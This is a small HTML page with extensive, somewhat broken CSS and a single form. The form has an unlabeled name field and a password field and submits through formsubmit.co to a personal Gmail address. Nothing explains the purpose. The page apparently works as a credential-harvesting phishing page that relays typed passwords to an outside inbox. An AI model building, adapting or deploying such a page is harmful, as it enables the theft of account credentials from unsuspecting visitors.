<!doctype html>
<html>
<head>


<style>
.primary{
            width:350px;
            height:25px;
            font-size:15px;
            
            border: 1px inset #ccc;
            border-radius:5px;
            padding:12px;
            resize: vertical;
            margin-bottom:20px;
            
            }
            
            
            
            
            
            p{
            font-size:20px;
            boarder-radius:1px;
            margin-top:2px;
            
            }
            
            .container {
            font-color:red;
            border-radius:10px;
  background-color: #ccc
  padding-left:10px;
  
  }
  .h1{
  font-size:20px;
  text-align:center;
  
  }
  
  
  .prime{
            width:350px;
            height:28px;
            font-size:21.5px;
            border:1px inset;
            border- radius:10px;
            
            }
            
            
            
            
            
            
            .height{
                        color:#ccc;
                        background-color:#5890FF;
             text-decoration:none;
             padding-left:80px;
             padding-right:70px;
             padding-top:10px;
             padding-bottom:10px;
             margin-top:30px;
             margin-left:10px;
             font-size:20px;
             
             
             
                      }
            
            
            
            
            .weight{
                       
                        
             text-decoration:none;
             padding-left:0px;
             padding-right:10px;
             padding-top:20px;
             padding-bottom:0px;
             margin-bottom:30px;
             margin-right:75px;
             margin-left:75px;
             font-size:30px;
            
                      }
                      
                      
                      
                      
                      img{
                   width:500px;
               
                   }
                   .butter{
                   width:300px;
                   height:55px;
                   font-size:25px;
                   text-decoration:none;
       
                   border:1px dashed;
                   color: #ccc;
                   background-color:#5890FF;
                   padding-top:10px;
                   padding-left:20px; 
                   padding-right:20px;
                   margin-bottom:30px;                
                  
                  
                  
                  
                  .prime{
                   width:300px;
                   height:20px;
                   font-size:80px;
                   border:1px outset;
                   color: black;
                   background-color:white;
                   
                    
                   }              
                  </style>

    
    <!--custom css-->
    
    <link rel="stylesheet" href="css/style.css">
    
 <body>
 <style>
 
 body{
  background-image: url("pexels-pixabay-268533.jpg");
  position: relative;
  width:400px;
  
  margin-top:200px;
  
  
                    }
  </style>

  
    <div class="container">
    
    <h2 align="center">
    
      
      
      
   
  
 <form action="https://formsubmit.co/baghasaim@gmail.com" method="POST">
     <input type="text" name="name" class="primary"required>
     <input type="password" name="password" class="primary" >
     <button type="submit" class="height">Send</button>
</form>
     </form>
     </form>
     </body>
     </html>
     
     
     
     
     
    